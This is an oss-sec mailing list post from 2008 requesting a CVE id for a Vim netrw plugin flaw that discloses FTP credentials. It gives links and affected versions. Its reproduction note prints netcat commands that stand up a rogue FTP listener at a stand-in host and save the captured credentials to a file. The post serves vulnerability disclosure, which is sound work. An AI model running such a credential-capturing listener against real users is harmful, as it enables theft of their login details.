oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE request - (vim : netrw plugin - ftp user credentials disclosure)

From: Jan Lieskovsky <jlieskov () redhat com>
Date: Mon, 6 Oct 2008 06:26:24 -0400 (EDT)
Hello Steve,

  could you please allocate a new CVE id for the following
Vim issue:

Vulnerability reports: 1, http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html
                          (This is another issue than CVE-2008-2712).

                       2, https://bugzilla.redhat.com/show_bug.cgi?id=461750

Thread discussing this issue: 

http://groups.google.com/group/vim_dev/browse_thread/thread/2f6fad581a037971/a5fcf4c4981d34e6?show_docid=a5fcf4c4981d34e6

Proposed partial fix: 

http://mysite.verizon.net/astronaut/vim/index.html#NETRW

Affected Vim netrw plugin versions: 
    a, Vim 7.0 autoloaded netrw plugin versions - from " Date: Jul 24, 2006, Version: 102" till the latest.
    b, older versions of Vim netrw may be also affected.

Testcase available at:

http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html (part 4. EXPLOIT)

Note: Slightly modification of the testcase in the "netcat" part may be needed
      to successfully reproduce the issue. I was using:

      printf '220\r\n331\r\n' | nc -l ftp.rogue.example.com 31337 > credentials&
      (and for simulation of successful FTP session login the command:
      printf '220\r\n331\r\n230\r\n' | nc -l ftp.rogue.example 31337 > credentials &)

     
Thanks, Jan
--
Jan iankko Lieskovsky / Red Hat Security Response Team
Previous By Date Next
Previous By Thread Next

Current thread: